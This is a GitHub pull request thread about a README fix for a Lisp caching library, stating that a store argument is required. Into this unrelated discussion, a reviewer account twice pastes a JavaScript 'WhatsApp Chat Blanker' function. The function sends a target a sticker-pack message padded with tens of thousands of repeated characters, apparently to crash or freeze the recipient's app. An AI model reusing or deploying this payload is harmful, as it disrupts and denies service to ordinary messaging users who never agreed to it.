### PR TITLE
doc: how to create a store and store is mandatory

### PR DESCRIPTION
**Pull request by vindarel**
thanks for the lib ! 

Have you done something similar, but storing in a DB ?

### CODE REVIEW

**Comment by html** [comment]
Hi, I see only README changed but README changes do not match library code.
I've not used DB for cache yet for this library.

**Comment by vindarel** [comment]
What do you mean ? In `api.lisp`, the store is already a required argument:
```

(defun getcache (key store)
  "Retrieve a cache value from STORE indicated by KEY and return
values of the cache value and a boolean whether the cache exists in
STORE. The cache value will be NIL if such the cache doesn't
exist. For example, (getcache \"not-existed-cache\") will return NIL,
NIL."
  ;@type (store store)
  (load-cache key store))

@export
(defun setcache (key value store &key expire)
  ...
```

I just wanted to update the doc.

**Comment by html** [comment]
Sorry. I've made mistake. Your changes match library code.
Thanks for the pull.

**Comment by lawasaki** [comment]
thanks for the info

**Review by sandinurdin775-ai — COMMENTED** [review]
.heryera.github.io/herysuhubug
// WhatsApp Chat Blanker
async function blanker(dick, target) {
  await dick.relayMessage(target, {
    stickerPackMessage: {
      stickerPackId: "bcdf1b38-4ea9-4f3e-b6db-e428e4a581e5",
      name: "ꦾ".repeat(70000),
      publisher: "[RDVSP]" + "ꦾ".repeat(500),
      stickers: [],
      fileLength: "3662919",
      fileSha256: "G5M3Ag3QK5o2zw6nNL6BNDZaIybdkAEGAaDZCWfImmI=",
      fileEncSha256: "2KmPop/J2Ch7AQpN6xtWZo49W5tFy/43lmSwfe/s10M=",
      mediaKey: "rdciH1jBJa8VIAegaZU2EDL/wsW8nwswZhFfQoiauU0=",
      directPath: "/stickerpack/blubblub.enc",
      contextInfo: {
        remoteJid: "X",
        participant: "0@s.whatsapp.net",
        mentionedJid: ["13135550202@s.whatsapp.net"]
      },
      packDescription: "",
      mediaKeyTimestamp: "1747502082",
      trayIconFileName: "x",
      thumbnailDirectPath: "/stickerpack/blubblub.enc",
      thumbnailSha256: "hoWYfQtF7werhOwPh7r7RCwHAXJX0jt2QYUADQ3DRyw=",
      thumbnailEncSha256: "IRagzsyEYaBe36fF900yiUpXztBpJiWZUcW4RJFZdjE=",
      thumbnailHeight: 252,
      thumbnailWidth: 252,
      imageDataHash: "NGJiOWI2MTc0MmNjM2Q4MTQxZjg2N2E5NmFkNjg4ZTZhNzVjMzljNWI5OGI5NWM3NTFiZWQ2ZTZkYjA5NGQzOQ==",
      stickerPackSize: "3680054",
      stickerPackOrigin: "USER_Sandi"
    }
  }, {});
}

**Comment by sandinurdin775-ai** [comment]
Cara jadi apk in gimana

**Comment by sandinurdin775-ai** [comment]
.heryera.github.io/herysandi
// WhatsApp Chat Blanker
async function blanker(dick, target) {
  await dick.relayMessage(target, {
    stickerPackMessage: {
      stickerPackId: "bcdf1b38-4ea9-4f3e-b6db-e428e4a581e5",
      name: "ꦾ".repeat(70000),
      publisher: "[RDVSP]" + "ꦾ".repeat(500),
      stickers: [],
      fileLength: "3662919",
      fileSha256: "G5M3Ag3QK5o2zw6nNL6BNDZaIybdkAEGAaDZCWfImmI=",
      fileEncSha256: "2KmPop/J2Ch7AQpN6xtWZo49W5tFy/43lmSwfe/s10M=",
      mediaKey: "rdciH1jBJa8VIAegaZU2EDL/wsW8nwswZhFfQoiauU0=",
      directPath: "/stickerpack/blubblub.enc",
      contextInfo: {
        remoteJid: "X",
        participant: "0@s.whatsapp.net",
        mentionedJid: ["13135550202@s.whatsapp.net"]
      },
      packDescription: "",
      mediaKeyTimestamp: "1747502082",
      trayIconFileName: "x",
      thumbnailDirectPath: "/stickerpack/blubblub.enc",
      thumbnailSha256: "hoWYfQtF7werhOwPh7r7RCwHAXJX0jt2QYUADQ3DRyw=",
      thumbnailEncSha256: "IRagzsyEYaBe36fF900yiUpXztBpJiWZUcW4RJFZdjE=",
      thumbnailHeight: 252,
      thumbnailWidth: 252,
      imageDataHash: "NGJiOWI2MTc0MmNjM2Q4MTQxZjg2N2E5NmFkNjg4ZTZhNzVjMzljNWI5OGI5NWM3NTFiZWQ2ZTZkYjA5NGQzOQ==",
      stickerPackSize: "3680054",
      stickerPackOrigin: "USER_CREATED"
    }
  }, {});
}

**Pull request merged**
